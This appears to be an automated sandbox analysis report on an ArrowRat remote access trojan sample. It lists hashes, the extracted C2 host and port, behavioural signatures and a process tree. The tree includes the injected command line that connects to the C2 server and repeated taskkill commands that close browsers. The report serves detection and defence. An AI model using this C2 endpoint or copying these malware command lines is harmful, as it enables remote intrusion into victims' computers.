Analysis

  • max time kernel
    1049s
  • max time network
    1055s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-04-2024 03:54

General

  • Target

    Client.exe

  • Size

    158KB

  • MD5

    5e22cda2042ee1c0852c8f0e9384568d

  • SHA1

    4da0e3c69e0959d9095698d5de4ca7a0a2a979d1

  • SHA256

    3e4d0107aacb87e46505f2e292962c929229cad6a05e1cc35320cf9bac2429e9

  • SHA512

    bbb4694379297b9f8ee8bb42a0a99a7f4321d2475e028c89ca9b364a3f8661cdc0b24178f0f55af6e8d2726c714a7a76110afef5d029657a48af72f998a12e54

  • SSDEEP

    3072:TbzoH+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfPZFO8Y:Tbzoe0ODhTEPgnjuIJzo+PPcfPZo8

Malware Config

Extracted

Family

arrowrat

Botnet

DevsWhoFuckDevs

C2

vacation-transferred.gl.at.ply.gg:12652

Mutex

brbqyqTdu

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

  • Downloads MZ/PE file
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Sets file execution options in registry 2 TTPs 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 36 IoCs
  • Loads dropped DLL 40 IoCs
  • Registers COM server for autorun 1 TTPs 64 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Checks system information in the registry 2 TTPs 26 IoCs

    System information is often read in order to detect sandboxing environments.

  • Suspicious use of NtCreateThreadExHideFromDebugger 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 63 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Kills process with taskkill 8 IoCs
  • Modifies Internet Explorer settings 1 TTPs 16 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 43 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 63 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2400
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      2⤵
      • Modifies Installed Components in the registry
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:1556
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DevsWhoFuckDevs vacation-transferred.gl.at.ply.gg 12652 brbqyqTdu
      2⤵
        PID:3368
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c taskkill /F /IM firefox.exe
          3⤵
            PID:4896
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM firefox.exe
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:5632
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /c taskkill /F /IM edge.exe
            3⤵
              PID:4752
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM edge.exe
                4⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:524
            • C:\Windows\SysWOW64\cmd.exe
              "cmd.exe" /c taskkill /F /IM chrome.exe
              3⤵
                PID:4980
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM chrome.exe
                  4⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1536
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /c taskkill /F /IM brave.exe
                3⤵
                  PID:1408
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /IM brave.exe
                    4⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5448
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd.exe" /c taskkill /F /IM edge.exe
                  3⤵
                    PID:4424
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /F /IM edge.exe
                      4⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:6092
                  • C:\Windows\SysWOW64\cmd.exe
                    "cmd.exe" /c taskkill /F /IM firefox.exe
                    3⤵
                      PID:2004
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM firefox.exe
                        4⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4348
                    • C:\Windows\SysWOW64\cmd.exe
                      "cmd.exe" /c taskkill /F /IM vivaldi.exe
                      3⤵
                        PID:2008
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM vivaldi.exe
                          4⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4040
                      • C:\Windows\SysWOW64\cmd.exe
                        "cmd.exe" /c taskkill /F /IM Maxthon.exe
                        3⤵
                          PID:4028
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /F /IM Maxthon.exe
                            4⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3296
                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                      1⤵
                      • Suspicious use of SetWindowsHookEx
                      PID:3544
                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                      1⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of SetWindowsHookEx
                      PID:2372
                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                      1⤵
                      • Enumerates system info in registry
                      • Modifies Internet Explorer settings
                      • Modifies registry class
                      • Suspicious use of SetWindowsHookEx
                      PID:2764
                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                      1⤵
                      • Modifies Internet Explorer settings
                      • Modifies registry class
                      • Suspicious use of SetWindowsHookEx
                      PID:1536
                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                      1⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of SetWindowsHookEx
                      PID:2428
                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                      1⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of SetWindowsHookEx
                      PID:4268
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3576
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe"
                        2⤵
                        • Checks processor information in registry
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:4916
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.0.1703129882\2056543170" -parentBuildID 20221007134813 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2d0301a1-04ee-46e7-bdc0-d00f9807408f} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 1972 146b6de0d58 gpu
                          3⤵
                            PID:3928
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.1.860216384\1746032454" -parentBuildID 20221007134813 -prefsHandle 2384 -prefMapHandle 2380 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a10fd97f-ed6b-462b-be1a-79ed49caab24} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 2412 146b68e4a58 socket
                            3⤵
                              PID:4336
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.2.2101949288\1811482051" -childID 1 -isForBrowser -prefsHandle 3432 -prefMapHandle 3428 -prefsLen 20823 -prefMapSize 233444 -jsInitHandle 1200 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {189802b7-34e0-4914-86f8-42424b359a66} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 3504 146ba4b6f58 tab
                              3⤵
                                PID:4648
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.3.1252166311\1139264746" -childID 2 -isForBrowser -prefsHandle 3156 -prefMapHandle 1420 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1200 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {04c8101c-f71a-4181-8521-5ae4e2bf2a8e} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 2880 146aa164158 tab
                                3⤵
                                  PID:4656
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.4.398155454\239550476" -childID 3 -isForBrowser -prefsHandle 4368 -prefMapHandle 4364 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1200 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8205c7d1-820f-4ece-b7ba-75f0d8ec6064} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 4376 146bc743858 tab
                                  3⤵
                                    PID:4624
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.5.894640039\1710628538" -childID 4 -isForBrowser -prefsHandle 5176 -prefMapHandle 5172 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1200 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4382c473-b293-4b67-a52c-3e91e6939a9c} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 5184 146bc743258 tab
                                    3⤵
                                      PID:5956
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.6.1510476225\828823533" -childID 5 -isForBrowser -prefsHandle 5304 -prefMapHandle 5308 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1200 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3b69997-7efc-4068-9887-f930642e2682} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 5384 146bc9e5858 tab
                                      3⤵
                                        PID:5964
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.7.1406868401\2039948754" -childID 6 -isForBrowser -prefsHandle 5400 -prefMapHandle 5500 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1200 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ecba845b-a61a-495b-b10e-648eb3c07e4b} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 5404 146bd071658 tab
                                        3⤵
                                          PID:5972
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
                                      1⤵
                                      • Enumerates system info in registry
                                      • NTFS ADS
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SendNotifyMessage
                                      • Suspicious use of WriteProcessMemory
                                      PID:644
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffda1da46f8,0x7ffda1da4708,0x7ffda1da4718
                                        2⤵
                                          PID:2028
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2
                                          2⤵
                                            PID:2988
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
                                            2⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4356
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:8
                                            2⤵
                                              PID:2596
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
                                              2⤵
                                                PID:5176
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
                                                2⤵
                                                  PID:5188
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1992 /prefetch:1
                                                  2⤵
                                                    PID:5508
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
                                                    2⤵
                                                      PID:5532
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3552 /prefetch:8
                                                      2⤵
                                                        PID:6052
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3552 /prefetch:8
                                                        2⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:5500
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
                                                        2⤵
                                                          PID:5936
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
                                                          2⤵
                                                            PID:5916
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
                                                            2⤵
                                                              PID:2412
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
                                                              2⤵
                                                                PID:5184
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
                                                                2⤵
                                                                  PID:2608
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
                                                                  2⤵
                                                                    PID:4464
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=4904 /prefetch:8
                                                                    2⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:3492
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6420 /prefetch:8
                                                                    2⤵
                                                                      PID:1744
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6228 /prefetch:8
                                                                      2⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:3176
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7120 /prefetch:2
                                                                      2⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:4060
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1144 /prefetch:1
                                                                      2⤵
                                                                        PID:4348
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6168 /prefetch:1
                                                                        2⤵
                                                                          PID:5816
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:1
                                                                          2⤵
                                                                            PID:1148
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6876 /prefetch:8
                                                                            2⤵
                                                                              PID:1316
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
                                                                              2⤵
                                                                                PID:3180
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6340 /prefetch:8
                                                                                2⤵
                                                                                  PID:2012
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2236,5881192617111366134,8094999730870471950,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7268 /prefetch:8
                                                                                  2⤵
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:1472
                                                                                • C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe
                                                                                  "C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks whether UAC is enabled
                                                                                  • Drops file in Program Files directory
                                                                                  • Modifies Internet Explorer settings
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:5248
                                                                                  • C:\Program Files (x86)\Roblox\Versions\version-f573c8cc796e4c97\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe
                                                                                    MicrosoftEdgeWebview2Setup.exe /silent /install
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Drops file in Program Files directory
                                                                                    PID:2644
